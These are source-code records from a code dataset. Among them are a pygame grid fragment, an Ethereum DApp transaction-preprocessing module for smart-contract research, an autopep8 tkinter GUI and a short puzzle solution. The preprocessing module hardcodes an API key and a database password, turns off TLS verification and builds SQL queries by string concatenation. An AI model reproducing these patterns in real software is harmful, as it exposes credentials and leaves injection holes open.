'.':[1],'-':[3],',':[2],':':[1],'+':[3],'\\'':[1],'!':[1],'?':[3],\r\n '0':[3],'1':[3],'2':[3],'3':[3],'4':[3],'5':[3],'6':[3],'7':[3],'8':[3],'9':[3],\r\n '(':[2],')':[2],'/':[3],'_':[5],'=':[3],'\\\\':[3],'[':[2],']':[2],'*':[3],'\"':[3],'<':[3],'>':[3],';':[1]}\r\n\r\n self.font = generate_font('font/small_font.png', self.font_dat, 5, 8, (255, 255, 255)) \r\n\r\n #Initialize Grids\r\n for i in range(self.cols):\r\n arr = []\r\n for j in range(self.rows):\r\n arr.append(Grid(i, j, self.w, self.h))\r\n self.grid.append(arr)\r\n\r\n for i in range(bombs):\r\n a, b = random.randint(0, cols-1), random.randint(0, rows-1)\r\n while self.grid[a][b].bomb:\r\n a, b = random.randint(0, cols-1), random.randint(0, rows-1)\r\n self.grid[a][b].bomb = True\r\n\r\n\r\n self.main()\r\n\r\n # Put or remove walls\r\n def clickWall(self, pos, state):\r\n tile = self.grid[pos[0] // self.w][pos[1] // self.h]\r\n tile._id();\r\n\r\n def main(self):\r\n while True:\r\n for event in pygame.event.get(): # All events (mouse moving, button clicks, mouse clicks etc)\r\n if event.type == pygame.QUIT: # If they try to close the window\r\n pygame.quit()\r\n sys.exit()\r\n elif event.type == pygame.MOUSEBUTTONDOWN: # If they press the mouse (any button)\r\n if event.button in (1, 3): # And it's a left or right click\r\n self.clickWall(pygame.mouse.get_pos(), event.button==1) # Click a wall with either (True as a left click or False as not a left click (a right click)\r\n\r\n\r\n self.win.fill((236,240,241))\r\n\r\n for i in range(self.cols):\r\n for j in range(self.rows):\r\n spot = self.grid[i][j]\r\n spot.show(self.win)\r\n show_text(str(i+j*self.cols+1), i*self.w+self.w//3+2, j*self.h+self.h//3+10, 1, 9999, self.font, self.win) \r\n \r\n pygame.display.flip()\r\n\r\n\r\nintro = Data()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"naschwin/Lottery-Picker","sub_path":"Game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12218062700","text":"# -*- coding: utf-8 -*-\nimport zipfile, os, sys\nimport requests, ssl, json\nimport pymysql\nimport re\nimport numpy as np\nimport pandas as pd\nimport json, csv\nimport traceback\nimport logging\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime, timedelta\nimport time\nfrom tqdm import tqdm\nfrom sqlalchemy import create_engine\nimport base64\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom collections import Counter\nimport random\nfrom web3.auto.infura import w3\nfrom copy import copy\nfrom bisect import bisect_left, bisect_right\nfrom baseFunction import read_list, save_list, graphConstructor, calcGraphSimilarityByGED\nimport calendar\n\nif w3.isConnected() is not True:\n print(\"connect to node error, please check your setting....\")\n print(\">>> https://web3py.readthedocs.io/en/stable/providers.html\")\n \ndef jaccard_similarity(s1, s2):\n def add_space(s):\n return ' '.join(list(s))\n \n # 将字中间加入空格\n s1, s2 = add_space(s1), add_space(s2)\n # 转化为TF矩阵\n cv = CountVectorizer(tokenizer=lambda s: s.split())\n corpus = [s1, s2]\n vectors = cv.fit_transform(corpus).toarray()\n # 求交集\n numerator = np.sum(np.min(vectors, axis=0))\n # 求并集\n denominator = np.sum(np.max(vectors, axis=0))\n # 计算杰卡德系数\n return 1.0 * numerator / denominator\ndef getAllABIInDB():\n # 获取数据表中全部的hashkey\n db = pymysql.connect( host='localhost',\n user='root',\n password='hello',\n db='dapp_analysis_rearrange'\n )\n cursor = db.cursor()\n sql = \"SELECT text_signature, hex_signature FROM MethodABI;\"\n cursor.execute(sql)\n repetitioon = cursor.fetchall()\n \n db.close()\n return repetitioon\n\ndef getAllTxInDB():\n db = pymysql.connect( host='localhost', user='root', password='hello', db='dapp_analysis_rearrange')\n cursor = db.cursor()\n sql = \"select distinct `hashKey` from TransactionDescription_trainset_extend_test;\"\n cursor.execute(sql)\n existedTxSet = set([r[0] for r in cursor.fetchall()])\n db.close()\n\n return existedTxSet\n\ndef getTypeDict():\n # 获取contract和type的对照字典\n db = pymysql.connect( host='localhost', user='root', password='hello', db='dapp_analysis_rearrange')\n cursor = db.cursor()\n sql = \"select address, type from SmartContract_transfer;\"\n cursor.execute(sql)\n repetition = cursor.fetchall()\n db.close()\n\n address2type = dict()\n for r in repetition:\n address2type[r[0]] = r[1]\n\n return address2type\n\nabiTuple = getAllABIInDB()\n# existedTxSet = getAllTxInDB()\naddress2type = getTypeDict()\n\nclass Preprocessing(object):\n\n def __init__(self, gameName, gameAddr):\n context = ssl._create_unverified_context()\n requests.adapters.DEFAULT_RETRIES = 500\n\n self.headers = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3112.90 Safari/537.36'}\n self.proxy = {'http': 'socks5://127.0.0.1:1086','https':'socks5://127.0.0.1:1086'}\n\n self.gameName = gameName\n self.gameAddr = gameAddr\n self.denoisingAddr = self.getDenoisingAddrByGameDB()\n self.gameAddress = set()\n self.gameDict = dict()\n\n self.address2type = address2type\n self.address2code = dict()\n\n self.mode = \"test\"\n\n def getTXbyGameNameInET(self):\n # 利用游戏名获取交易中的所有控制用户地址userAddress\n db = pymysql.connect( host='localhost', user='root', password='hello', db='dapp_analysis_rearrange')\n cursor = db.cursor()\n sql = \"SELECT td.*,g.jsonContent FROM TransactionGraph AS g LEFT JOIN ExtendTx AS td ON g.hashKey=td.hashKey WHERE td.gameName=\\\"%s\\\";\"% self.gameName\n cursor.execute(sql)\n repetition = cursor.fetchall()\n\n handled_tx = \"select distinct `seed` from TransactionDescription_trainset_extend_test;\"\n cursor.execute(handled_tx)\n handled_rep = set([r[0] for r in cursor.fetchall()])\n db.close()\n\n repetition = [r for r in repetition if r[0] not in handled_rep]\n\n return repetition\n\n\n def saveTXbyGameNameInET(self):\n # 利用游戏名获取交易中的所有控制用户地址userAddress\n db = pymysql.connect( host='localhost', user='root', password='hello', db='dapp_analysis_rearrange')\n cursor = db.cursor()\n sql = \"SELECT td.*,g.jsonContent FROM TransactionGraph AS g LEFT JOIN ExtendTx AS td ON g.hashKey=td.hashKey WHERE td.gameName=\\\"%s\\\";\"% self.gameName\n cursor.execute(sql)\n repetition = cursor.fetchall()\n\n handled_tx = \"select distinct `seed` from TransactionDescription_trainset_extend_test;\"\n cursor.execute(handled_tx)\n handled_rep = set([r[0] for r in cursor.fetchall()])\n db.close()\n\n repetition = [r for r in repetition if r[0] not in handled_rep]\n\n return repetition\n\n\n def getTXbyGameNameInTD(self):\n # 利用游戏名获取交易中的所有控制用户地址userAddress\n db = pymysql.connect( host='localhost', user='root', password='hello', db='dapp_analysis_rearrange')\n cursor = db.cursor()\n sql = \"SELECT td.*,g.jsonContent FROM TransactionGraph AS g LEFT JOIN TransactionDescription AS td ON g.hashKey=td.hashKey WHERE td.gameName=\\\"%s\\\";\"% self.gameName\n cursor.execute(sql)\n repetition = cursor.fetchall()\n\n handled_tx = \"select distinct `seed` from TransactionDescription_trainset_extend_test;\"\n cursor.execute(handled_tx)\n handled_rep = set([r[0] for r in cursor.fetchall()])\n db.close()\n\n repetition = [r for r in repetition if r[0] not in handled_rep]\n\n return repetition\n\n def getDenoisingAddrByGameDB(self):\n # 获取需要denoising的地址\n db = pymysql.connect( host='localhost', user='root', password='hello', db='dapp_analysis_rearrange')\n cursor = db.cursor()\n sql = \"SELECT smartContractAddress FROM GameContract WHERE gameName=\\\"%s\\\";\"% self.gameName\n cursor.execute(sql)\n repetition = cursor.fetchall()\n db.close()\n\n denoisingAddr = [i[0] for i in repetition]\n return denoisingAddr\n \n def getEOAsOfGame(self, repetition):\n # 获取全部和这个游戏交互的地址\n addrSet = set([ r[1] for r in repetition]).union(set([ r[6] for r in repetition]))\n addrSet = set([addr for addr in addrSet if addr not in self.denoisingAddr and addr is not None])\n # 拆分user和contract\n userSet = set()\n contractSet = set()\n for addr in addrSet:\n addrType = self.typeIdentify(addr)\n if addrType == \"user\":\n userSet.add(addr)\n elif addrType == \"contract\":\n contractSet.add(addr)\n else:\n print(\"%s 的属性为 %s, 不属于user或contract\" % (addr, self.address2type[addr]))\n continue\n return userSet, contractSet\n\n def getEOAsOfGameInET(self, repetition):\n # 获取全部和这个游戏交互的地址\n userSet = set([ r[8] for r in repetition if r[9] == \"user\"])\n contractSet = set([r[11] for r in repetition if r[11] not in self.denoisingAddr and r[12] == \"contract\"])\n return userSet, contractSet\n\n def pickTxbyETInWeb(self, wholeTxList, period):\n pickTxList = [tx for tx in wholeTxList if int(tx['timeStamp']) >= period[0] and int(tx['timeStamp']) <= period[1]]\n timestampArray = np.array([tx['timeStamp'] for tx in wholeTxList], dtype=int)\n startIdx = np.searchsorted(timestampArray, period[0])\n endIdx = np.searchsorted(timestampArray, period[1], side='right')\n return wholeTxList[startIdx:endIdx]\n\n def preprocessing(self):\n repetition = self.getTXbyGameName()\n userSet, contractSet = self.getEOAsOfGame(repetition)\n \n for user in tqdm(userSet):\n focusTxlist = [r for r in repetition if r[1] == user or r[6] == user]\n periodList = self.periodListCalcu(user, focusTxlist)\n wholeTxList = self.getTxlistByAddress(user) # 获取到全部的tx列表\n pickedTxList = self.pickTx(wholeTxList, periodList)\n self.saveTxlistToDB(pickedTxList)\n\n return\n\n def pickTx(self, wholeTxList, periodList):\n timestampArray = np.array([int(tx['timeStamp']) for tx in wholeTxList], dtype=int)\n pickTxList = []\n for period in periodList:\n startIdx = np.searchsorted(timestampArray, period[0])\n endIdx = np.searchsorted(timestampArray, period[1], side='right')\n for tx in wholeTxList[startIdx : endIdx]:\n tx['seed'] = period[2]\n pickTxList.append(tx)\n dupSeedHash = [item for item, count in Counter([tx['hash'] for tx in pickTxList]).items() if count > 1]\n \n dupSeedTxlist = []\n for hashKey in dupSeedHash:\n dupSeedTxs = [tx for tx in pickTxList if tx['hash'] == hashKey]\n tx = dupSeedTxs[0]\n tx['seed'] = \", \".join(set([tx['seed'] for tx in dupSeedTxs]))\n pickTxList = [tx for tx in pickTxList if tx['hash'] != hashKey]\n pickTxList.append(tx)\n \n return pickTxList\n\n def distance(self, r1, r2):\n g1 = graphConstructor(json.loads(r1[-1]))\n g2 = graphConstructor(json.loads(r2[-1]))\n # 计算相邻两张图的编辑距离\n graphDistance = calcGraphSimilarityByGED(g1, g2) # 返回的是距离,值越小表示越相似\n date1 = r1[4]\n date2 = r2[4]\n dateDistance = abs((date1-date2).total_seconds()/60) # 按分钟来算相差的时间\n\n alpha = 1\n beta = 1\n distance = alpha*graphDistance + beta*dateDistance\n return distance\n\n def getCodeByAddress(self, address):\n if address in self.address2code.keys():\n return self.address2code[address]\n else:\n code = w3.eth.getCode(w3.toChecksumAddress(address))\n self.address2code[address] = code\n return code\n\n def CodeSimilarity(self, address):\n simList = []\n for i in self.documentedContractSet:\n simList.append(jaccard_similarity(w3.toHex(self.getCodeByAddress(address)), w3.toHex(self.getCodeByAddress(i))))\n\n return max(simList)\n\n\n # --------------------------------------------------------------\n def typeIdentify(self, addr):\n # 验证是否是地址\n if addr is None or len(addr) != 42 or addr[:2] != \"0x\":\n return None\n # 验证地址是user还是contract\n if addr not in self.address2type.keys():\n code = w3.eth.getCode(w3.toChecksumAddress(addr))\n if len(code)<1 and self.isExchange(addr) is True:\n self.address2type[addr] = \"exchange\"\n elif len(code) < 1 and self.isKilledAddress(addr) is True:\n self.address2code[addr] = code\n self.address2type[addr] = 'contract'\n elif len(code) < 1:\n self.address2type[addr] = \"user\"\n elif len(code) > 1:\n self.address2code[addr] = code\n self.address2type[addr] = 'contract'\n self.saveAddressToDB(addr, self.address2type[addr])\n return self.address2type[addr]\n\n\n def isKilledAddress(self, addr):\n url = \"https://etherscan.io/address/\" + addr\n res = requests.get(url, verify=False, timeout=50)\n soup = BeautifulSoup(res.content,'lxml')\n\n alist = soup.find('li',id=\"ContentPlaceHolder1_li_code\")\n if alist is not None:\n return True\n return False\n\n def isExchange(self, addr):\n url = \"https://etherscan.io/address/\" + addr\n res = requests.get(url, verify=False, timeout=50)\n soup = BeautifulSoup(res.content,'lxml')\n\n alist = soup.find_all('a',class_=\"u-label--secondary\")\n for a in alist:\n if a.text == \"Exchange\":\n return True\n return False\n\n def fillTimeInfo(self):\n timestampArray = [ calendar.timegm(i.timetuple()) for i in self.groupDate]\n self.timestampMean = np.mean(timestampArray)\n\n # self.timestampStd = np.std(timestampArray) if len(timestampArray) > 1 else 100000\n self.timestampStd = 20000\n self.timeMin = min(timestampArray) - self.timestampStd\n self.timeMax = max(timestampArray) + self.timestampStd\n print(\">>> time mean = \" + datetime.utcfromtimestamp(self.timestampMean).strftime(\"%Y-%m-%d %H:%M:%S\") + \" var = \" + str(self.timestampStd))\n print(\">>> timeMin = \" + datetime.utcfromtimestamp(self.timeMin).strftime(\"%Y-%m-%d %H:%M:%S\") + \"; timeMax = \" + datetime.utcfromtimestamp(self.timeMax).strftime(\"%Y-%m-%d %H:%M:%S\"))\n pass\n\n def getTxlistByAddress(self, address, startblock=0, endblock=99999999):\n # mode = time,表示只获取时间周期内的tx\n\n for i in range(5):\n url = \"http://api.etherscan.io/api?module=account&action=txlist&address=\" + address +\"&startblock=\" + str(startblock) + \"&endblock=\" + str(endblock) + \"&sort=desc&apikey=WQ5Y216EK6SP2E9SJIBVDJNI1BI7KAIR42\"\n res = requests.get(url, verify=False, timeout=50)\n text = json.loads(res.text)\n if text['message'] == 'OK':\n break\n elif \"Please select a smaller result dataset\" in text['message'] and (endblock - startblock) > 1:\n print(\"# 数据过大,startblock %d, endblock %d\" % (startblock, endblock))\n endblock = (endblock - startblock)/10 + startblock\n\n \n txlist = text['result'][::-1] # etherscan返回的结果里有tx是多余的\n\n if len(txlist) > 2000:\n print(\"%s 地址的tx长度为%d\" % (address, len(txlist)))\n for i in range(0, len(txlist)):\n txlist[i]['from'] = txlist[i]['from'].lower()\n txlist[i]['to'] = txlist[i]['to'].lower()\n return txlist\n\n def periodListCalcu(self, address, focusTxlist):\n periodList = []\n for tx in focusTxlist:\n time = datetime.utcfromtimestamp(int(tx['timeStamp']))\n timeMin = time - timedelta(days=1)\n # timeMax = time + timedelta(days=1)\n timeMax = time + timedelta(seconds=1)\n periodList.append( (calendar.timegm(timeMin.timetuple()), calendar.timegm(timeMax.timetuple()), tx['hash']) )\n\n return periodList\n\n def periodListCalcuForEnlarger(self, address, focusTxlist):\n periodList = []\n for tx in focusTxlist:\n time = tx[1]\n timeMin = time - timedelta(days=1)\n # timeMax = time + timedelta(days=1)\n timeMax = time + timedelta(days=1)\n periodList.append( (calendar.timegm(timeMin.timetuple()), calendar.timegm(timeMax.timetuple()), tx[0]) )\n\n return periodList\n\n def periodListCalcuForTest(self, address, focusTxlist):\n periodList = []\n for tx in focusTxlist:\n time = tx[4]\n timeMin = time - timedelta(days=1)\n timeMax = time + timedelta(days=1)\n # timeMax = time + timedelta(seconds=1)\n periodList.append( (calendar.timegm(timeMin.timetuple()), calendar.timegm(timeMax.timetuple()), tx[0]) )\n\n return periodList\n\n def getTXbyGameAddressInWeb(self, dapp, startblock=0, endblock=99999999):\n txlist = self.getTxlistByAddress(dapp, startblock=startblock, endblock=endblock)\n return txlist\n\n def decodeMethod(self, tx):\n if len(tx['to']) == 0 and len(tx[\"input\"])>2:\n return \"contract creation\"\n elif tx['input'] == '0x':\n return \"transfer\"\n elif len(tx[\"input\"]) > 10:\n return self.Hex2Text(tx[\"input\"][:10], tx[\"input\"])\n else:\n return tx[\"input\"]\n def Hex2Text(self, hex, input):\n candidateSign = [i[0] for i in abiTuple if i[1] == hex]\n if len(candidateSign) == 1:\n return candidateSign[0]\n elif len(candidateSign) == 0:\n return hex\n else:\n s = len(input[10:])/64\n for c in candidateSign:\n paraCnt = len(c.split(\",\"))\n if paraCnt == s:\n return c\n return hex\n\n return hex\n def tupleBuild(self, tx, user):\n tx['txDate'] = datetime.utcfromtimestamp(int(tx['timeStamp'])).strftime(\"%Y-%m-%d %H:%M:%S\")\n tx[\"txMethod\"] = self.decodeMethod(tx)\n tx['senderType'] = self.typeIdentify(tx['from'])\n tx['receiverType'] = self.typeIdentify(tx['to'])\n tx[\"value\"] = str(w3.fromWei(int(tx[\"value\"]), 'ether'))\n\n r = ( tx['hash'], tx['txDate'], self.gameName, self.gameAddr, tx['seed'], None,\n tx['from'], tx['senderType'], None, tx['txMethod'], tx['to'], tx['receiverType'], None, \n None, None, None, None, None, None, None, \n tx['value'], tx['input'], tx['isError'], tx['contractAddress'], None, self.gameName, None, None, 5, user\n )\n return r\n\n def saveTxlistToDB(self, pickedTxList, user):\n \n db = pymysql.connect('localhost', 'root', 'hello', 'dapp_analysis_rearrange')\n cursor = db.cursor()\n\n handled_tx = \"select distinct `hashKey` from TransactionDescription_goodset_extend where gameName = \\\"%s\\\";\" % self.gameName\n cursor.execute(handled_tx)\n handled_rep = set([r[0] for r in cursor.fetchall()])\n\n # updateSql = \"INSERT INTO TransactionDescription_testset_extend(hashKey, txDate, gameName, gameAddress, seed, similarity, sender, senderType, senderName, txMethod, receiver, receiverType, receiverName, txLabel, txLabelNew, labelReason, suicide, profit, traceCnt, prepare, value, input, isError, contractAddress, ori, seedGame, seedEOA) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\"\n # updateSql = \"INSERT INTO TransactionDescription_trainset_extend_test(hashKey, txDate, gameName, gameAddress, seed, similarity, sender, senderType, senderName, txMethod, receiver, receiverType, receiverName, txLabel, txLabelNew, labelReason, suicide, profit, traceCnt, prepare, value, input, isError, contractAddress, ori, seedGame, graphDistance, dateDistance, stage, seedEOA) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\"\n updateSql = \"INSERT INTO TransactionDescription_goodset_extend(hashKey, txDate, gameName, gameAddress, seed, similarity, sender, senderType, senderName, txMethod, receiver, receiverType, receiverName, txLabel, txLabelNew, labelReason, suicide, profit, traceCnt, prepare, value, input, isError, contractAddress, ori, seedGame, graphDistance, dateDistance, stage, seedEOA) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\"\n\n for tx in pickedTxList:\n try:\n if tx['hash'] not in handled_rep:\n r = self.tupleBuild(tx, user)\n cursor.execute(updateSql, r)\n db.commit()\n except Exception as e:\n db.rollback()\n print(e)\n print(\" address is %s and hashkey is %s\" % (tx['seed'], tx['hash']))\n # print(r)\n continue\n\n db.close()\n\n\n def saveAddressToDB(self, addr, addrType):\n db = pymysql.connect('localhost', 'root', 'hello', 'dapp_analysis_rearrange')\n cursor = db.cursor()\n updateSql = \"INSERT INTO SmartContract_transfer(address, type, byteCode, sourceCode, `level`, `detail`, killed) VALUES (%s, %s, %s, %s, %s, %s, %s);\"\n r = (addr, addrType, None, None, None, None, None)\n try:\n cursor.execute(updateSql, r)\n # print(r)\n db.commit()\n except Exception as e:\n db.rollback()\n print(e)\n print(\" address %s 保存出错!\" % (addr))\n print(r)\n\n db.close()\n\n\n def getTxByEOAInTest(self, game, eoa, mode=\"goodset\"):\n # 利用游戏名获取交易中的所有控制用户地址userAddress\n db = pymysql.connect( host='localhost', user='root', password='hello', db='dapp_analysis_rearrange')\n cursor = db.cursor()\n if self.mode == \"test\":\n sql = \"SELECT td.*,g.jsonContent FROM TransactionDescription_testset AS td LEFT JOIN TransactionGraph_unknown AS g ON g.hashKey=td.hashKey WHERE td.gameName=\\\"\" + game + \"\\\" and td.controlUserAddress=\\\"\" + eoa + \"\\\" order by txDate;\"\n elif self.mode == \"enlarger\":\n sql = \"SELECT td.*,g.jsonContent FROM TransactionDescription_testset_enlarger AS td LEFT JOIN TransactionGraph_unknown AS g ON g.hashKey=td.hashKey WHERE td.gameName=\\\"\" + game + \"\\\" and td.sender=\\\"\" + eoa + \"\\\" order by txDate;\"\n elif self.mode == \"goodset\":\n sql = \"SELECT td.*,g.jsonContent FROM TransactionDescription_goodset_enlarger AS td LEFT JOIN TransactionGraph_goodset AS g ON g.hashKey=td.hashKey WHERE td.gameName=\\\"\" + game + \"\\\" and td.sender=\\\"\" + eoa + \"\\\" order by txDate;\"\n else:\n raise(\"不存在该mode,请检查\")\n\n cursor.execute(sql)\n repetition = cursor.fetchall()\n\n handled_tx = \"select distinct `seed` from TransactionDescription_goodset_extend where gameName=\\\"\" + game + \"\\\";\"\n cursor.execute(handled_tx)\n handled_rep = set([r[0] for r in cursor.fetchall()])\n handled_rep = set()\n db.close()\n\n repetition = [r for r in repetition if r[0] not in handled_rep]\n return repetition\n\n\n def getTxByEOAInTestET(self, game, eoa):\n # 利用游戏名获取交易中的所有控制用户地址userAddress\n db = pymysql.connect( host='localhost', user='root', password='hello', db='dapp_analysis_rearrange')\n cursor = db.cursor()\n sql = \"SELECT td.*,g.jsonContent FROM TransactionDescription_testset_extend AS td LEFT JOIN TransactionGraph AS g ON g.hashKey=td.hashKey WHERE td.gameName=\\\"\" + game + \"\\\" and td.sender=\\\"\" + eoa + \"\\\" order by txDate;\"\n cursor.execute(sql)\n repetition = cursor.fetchall()\n return repetition\n\n def tupleBuildInTest(self, r):\n try:\n tx = dict()\n tx['hashKey'] = r[0]\n tx['txDate'] = r[4]\n tx['gameName'] = r[2]\n tx['gameAddress'] = r[3]\n tx[\"txMethod\"] = r[5]\n tx['sender'] = r[1]\n tx['senderType'] = self.typeIdentify(r[1])\n tx['senderName'] = None\n tx['receiver'] = r[6]\n tx['receiverType'] = self.typeIdentify(r[6])\n tx['receiverName'] = r[7]\n tx['txLabel'] = None\n tx['txLabelNew'] = None\n tx['labelReason'] = \"ExtendTx\"\n tx['profit'] = None\n tx['traceCnt'] = None\n seedGame = r[2]\n except Exception as e:\n print(e)\n print(r[6])\n r = ( tx['hashKey'], tx['txDate'], tx['gameName'], tx['gameAddress'], tx['hashKey'], 0,\n tx['sender'], tx['senderType'], tx['senderName'], tx['txMethod'], tx['receiver'], tx['receiverType'], tx['receiverName'], \n tx['txLabel'], tx['txLabelNew'], tx['labelReason'], None, None, None, None,\n None, None, None, None, \"1\", seedGame, None\n )\n return r\n\n def tupleBuildInEnlarger(self, r):\n try:\n tx = dict()\n tx['hashKey'] = r[0]\n tx['txDate'] = r[4]\n tx['gameName'] = r[2]\n tx['gameAddress'] = r[3]\n tx[\"txMethod\"] = r[5]\n tx['sender'] = r[1]\n tx['senderType'] = self.typeIdentify(r[1])\n tx['senderName'] = None\n tx['receiver'] = r[6]\n tx['receiverType'] = self.typeIdentify(r[6])\n tx['receiverName'] = r[7]\n tx['txLabel'] = None\n tx['txLabelNew'] = None\n tx['labelReason'] = \"ExtendTx\"\n tx['profit'] = None\n tx['traceCnt'] = None\n seedGame = r[2]\n except Exception as e:\n print(e)\n print(r[6])\n r = ( tx['hashKey'], tx['txDate'], tx['gameName'], tx['gameAddress'], tx['hashKey'], 0,\n tx['sender'], tx['senderType'], tx['senderName'], tx['txMethod'], tx['receiver'], tx['receiverType'], tx['receiverName'], \n tx['txLabel'], tx['txLabelNew'], tx['labelReason'], None, None, None, None,\n None, None, None, None, \"1\", seedGame, None\n )\n return r\n\n def saveTestsetToDB(self, pickedTxList):\n \n db = pymysql.connect('localhost', 'root', 'hello', 'dapp_analysis_rearrange')\n cursor = db.cursor()\n updateSql = \"INSERT INTO TransactionDescription_testset_extend(hashKey, txDate, gameName, gameAddress, seed, similarity, sender, senderType, senderName, txMethod, receiver, receiverType, receiverName, txLabel, txLabelNew, labelReason, suicide, profit, traceCnt, prepare, value, input, isError, contractAddress, ori, seedGame, stage) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\"\n rep = []\n for tx in pickedTxList:\n try:\n r = self.tupleBuildInTest(tx)\n rep.append(r)\n cursor.execute(updateSql, r)\n db.commit()\n except Exception as e:\n db.rollback()\n print(e)\n # print(\"hashkey is %s\")\n print(r)\n continue\n\n db.close()\n\n def saveEnlargerToDB(self, pickedTxList):\n db = pymysql.connect('localhost', 'root', 'hello', 'dapp_analysis_rearrange')\n cursor = db.cursor()\n\n handled_tx = \"select distinct `hashKey` from TransactionDescription_goodset_extend where gameName = \\\"%s\\\";\" % self.gameName\n cursor.execute(handled_tx)\n handled_rep = set([r[0] for r in cursor.fetchall()])\n\n updateSql = \"INSERT INTO TransactionDescription_goodset_extend(hashKey, txDate, gameName, gameAddress, seed, similarity, sender, senderType, senderName, txMethod, receiver, receiverType, receiverName, txLabel, txLabelNew, labelReason, suicide, profit, traceCnt, prepare, value, input, isError, contractAddress, ori, seedGame, graphDistance, dateDistance, stage, seedEOA, txGameName, txGameAddress) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\"\n for r in pickedTxList:\n if r[0] not in handled_rep:\n try:\n cursor.execute(updateSql, r[:-1])\n db.commit()\n except Exception as e:\n db.rollback()\n print(e)\n print(\"hashkey is %s\" % r[0])\n # print(r)\n continue\n\n db.close()\n\nif __name__ == \"__main__\":\n context = ssl._create_unverified_context()\n requests.adapters.DEFAULT_RETRIES = 500\n game = \"godgame\"\n\n pre = Preprocessing(game)\n pre.preprocessing()\n\n\n\n","repo_name":"serea/smart_contract_lifecycle","sub_path":"DEFIER/Clustering/Preprocessing.py","file_name":"Preprocessing.py","file_ext":"py","file_size_in_byte":27603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41742130704","text":"import tkinter as tk\nfrom tkinter import filedialog, messagebox, simpledialog\nimport autopep8\nimport os\n\ndef format_file(file_path, original=False):\n try:\n with open(file_path, 'r') as file:\n original_code = file.read()\n\n formatted_code = autopep8.fix_code(original_code, options={'aggressive': 1})\n\n # If original is True, save the formatted code to a new file\n if original:\n base, ext = os.path.splitext(file_path)\n new_file_path = f\"{base}_formatted{ext}\"\n with open(new_file_path, 'w') as file:\n file.write(formatted_code)\n output(f\"Formatted and saved as new file: {os.path.basename(new_file_path)}\")\n else:\n with open(file_path, 'w') as file:\n file.write(formatted_code)\n output(f\"Formatted: {os.path.basename(file_path)}\")\n\n except Exception as e:\n messagebox.showerror(\"Error\", f\"An error occurred while formatting: {e}\")\n\ndef select_directory():\n directory_path = filedialog.askdirectory()\n if not directory_path:\n return\n\n # Clear the listbox and text widget\n file_listbox.delete(0, tk.END)\n text_widget.delete(1.0, tk.END)\n\n # List .py files in the directory\n for filename in sorted(os.listdir(directory_path)):\n if filename.endswith('.py'):\n file_listbox.insert(tk.END, filename)\n\n # Update the current directory path\n global current_directory\n current_directory = directory_path\n\ndef format_selected_file():\n if not current_directory:\n messagebox.showinfo(\"Info\", \"Please select a directory first.\")\n return\n\n selected = file_listbox.curselection()\n if not selected:\n messagebox.showinfo(\"Info\", \"Please select a file to format.\")\n return\n\n filename = file_listbox.get(selected[0])\n file_path = os.path.join(current_directory, filename)\n\n # Ask if the user wants to keep the original file\n keep_original = messagebox.askyesno(\"Keep Original\", \"Do you want to keep the original file?\")\n format_file(file_path, original=keep_original)\n\ndef output(message):\n text_widget.insert(tk.END, message + '\\n')\n text_widget.see(tk.END)\n\n# Create the main window\nroot = tk.Tk()\nroot.title(\"AutoPEP8 Formatter\")\n\ncurrent_directory = ''\n\n# Create and place the select directory button\nselect_button = tk.Button(root, text=\"Select Directory\", command=select_directory)\nselect_button.pack(pady=5)\n\n# Create and place the listbox for file selection\nfile_listbox = tk.Listbox(root)\nfile_listbox.pack(pady=5, fill=tk.BOTH, expand=True)\n\n# Create and place the format button\nformat_button = tk.Button(root, text=\"Format Selected File\", command=format_selected_file)\nformat_button.pack(pady=5)\n\n# Create and place the text widget for output\ntext_widget = tk.Text(root, height=10)\ntext_widget.pack(pady=5, fill=tk.BOTH, expand=True)\n\n# Start the GUI event loop\nroot.mainloop()\n","repo_name":"growcacti/Misc_scripts","sub_path":"Autopep8V2.py","file_name":"Autopep8V2.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1435237870","text":"def solve():\n N = input()\n L = len(N)\n first = N[0]\n minus = False\n near = int(first*L)\n if (int(N) < near): minus = True\n return (L - 1) * 9 + int(first) - int(minus)\n\nT = int(input())\nfor _ in range(T):\n print(solve())\n","repo_name":"henryliuser/hliu-cp","sub_path":"codeforces/L0/ordinary_numbers.py","file_name":"ordinary_numbers.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"8671943301","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom neutron_lib import context as context_lib\nfrom neutron_lib.db import api as db_api\nfrom neutron_lib.objects import 